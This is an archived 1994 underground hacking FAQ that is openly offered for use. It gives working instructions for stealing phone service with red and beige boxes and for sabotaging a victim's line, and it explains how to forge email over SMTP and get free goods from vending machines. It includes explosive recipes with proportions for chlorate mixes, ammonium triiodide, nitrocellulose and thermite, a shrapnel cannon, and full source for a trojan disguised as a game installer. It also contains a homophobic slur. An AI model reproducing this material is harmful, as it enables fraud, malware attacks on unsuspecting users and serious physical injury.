💾 Archived View for spam.works › mirrors › textfiles › hacking › haq1.txt captured on 2023-06-14 at 16:51:38.
View Raw
More Information
-=-=-=-=-=-=-
OK, it's a bit old but it *DOES* contain some valid information on UNIX
and Internet hacking... At least it's not as old as the Jolly Roger Cookbook
:), enjoy ppl
-=*( Prophet )*=-
Jun 13, 1994 19:54 from Belisarius
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop
=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<*> Edited by <*>
# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.
# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)
A MatrixMage Electronic Publication
Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>
Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack
AND NOW A WORD FROM YOUR EDITOR:
Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work. The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are 'hackers' the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.
-=> Belisarius <=-
- ********************************************************************
What is 'Cyberpunk' and the Underground?
"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown
That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture. Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote. And, as the quote says, they will
help spread it. Somewhere, somehow, that quote will change the
world.
But only if you work to change it. Remember that information and
knowledge a powerful commodities. He who has information cannot
be beaten. So above all the most important thing to do in the
"Underground" is to gather information. This means that you have to
work and put in some effort. You don't get something' for nothing!
So work hard and together we can change the world!
Keep up with latest editions. (Sorry there haven't been many lately
but exams and not failing out took precedence!)
The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.
- ********************************************************************
CONTENTS
- ********************************************************************
Sections
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail
(Fooling UUCP)
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang
(Making Weapons and Explosives)
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
VI. NEWBIES READ THIS
(Basic Hacking)
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
X. Finding out what that encrypted info is
(Cracking programs)
XI. How do I keep my info secure
(PGP / Cryptology)
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. Tuning in to what's on the radio waves
(Radios and Scanning)
Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Zines
E. Books
F. Files and Papers
G. Cataglogs
H. PGP Keys
- ********************************************************************
=====================================================================
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)
First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.
What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.
Instructions:
1) Open up the back of the tone dialer. Use screwdriver.
2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.
3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.
4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.
5) Put cover back on. you are done.
How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.
To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s
Here are the freqs for a red box:
$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head
1. Cut the head off one end of the phone cord.
2. Strip the coating back about two (2) inches.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a lamer, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the threaded end of bolts
in my area) with what should be a red wire and a green wire
coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!
Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
BEIGE BOXING 101
Field Phreaking
by Revolution
At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this file to whoever you want,
just make sure it all stays together, same title, same byline.
Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.
How to make a beige box: Easiest box to make. Cut your phone cord
before the jack, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)
How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on phone poles, where your phone line meets your house, and near
payphones. I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.
On telephone poles:
TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one phone line. These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)
Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of phone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.
Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.
Bell canisters: attached to phone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.
Mother load: Largest sw. ap. A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).
On houses: follow the phone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.
On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one. If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above). Payphones are normally pretty
secure now though, and you probably won't find any of those.
Phreaky things you can do: Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.
Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"
That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)
This service is called ANI.
This number may not work, but try it anyway:
(800) 825-6060
You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s. Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).
=====================================================================
II. Fake E-mail
(Fooling UUCP)
HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)
1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING "HELO".
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.
=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW ARE THE TRACKS OF ATM CARD ARRANGED?
The physical layout of the cards are standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but not
mandatory.
There are actually up to three tracks on a card.
Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).
Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.
Track 3:
The "OFF-LINE" ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.
=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)
FLASH POWDERS:
(from Neurophyre)
Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.
REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder
Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder
*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder
1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.
___________________________________
open --> ()____)_____)_____)_____)_____)_____) <--closed
(barrel) 1 2 3 4 5 6 (breach)
5. Duct tape all of the cans together. USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!
Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
acid, distilled water
Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
litmus paper
Procedure: 1. Pour 10mL of sulfuric acid into beaker.
2. Pour 10mL of nitric acid into beaker with sulfuric
acid.
3. Immediately add 0.5 gram of cotton.
4. Allow it to soak for EXACTLY three(3) minutes.
5. Remove the nitrocellulose.
6. Put the nitrocellulose into a beaker of distilled
water to wash it in.
7. Allow the material to dry.
8. Re-wash it.
9. Once neutral(acid/base) it can be dried and stored.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.
Materials: powdered aluminum, powdered iron oxide
Procedure: mix the two powders together as evenly as possible
Ignition: thermite is difficult to ignite but these work
a) mix a small amount of potassium chlorate into the
thermite mixture and ignite with a few drops of
sulfuric acid
b) magnesium strip or 'sparkler' stuck into the powder
which is then lit as a fuse
=====================================================================
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.
There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer
for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SAMPLE OF A TROJAN
(from Spear)
This is a little trojan I wrote in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:
-=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=
-=*( Prophet )*=-
____ __ __
/ __ \_________ ____ / /_ ___ / /_ The Truth Is Out There...
/ /_/ / ___/ __ \/ __ \/ __ \/ _ \/ __/
/ ____/ / / /_/ / /_/ / / / / __/ /_ Trust No-One...
/_/ /_/ \____/ .___/_/ /_/\___/\__/
/_/ Do Not Fear The Reaper,
prophet@illumini.demon.co.uk Fear Your God-Damn Government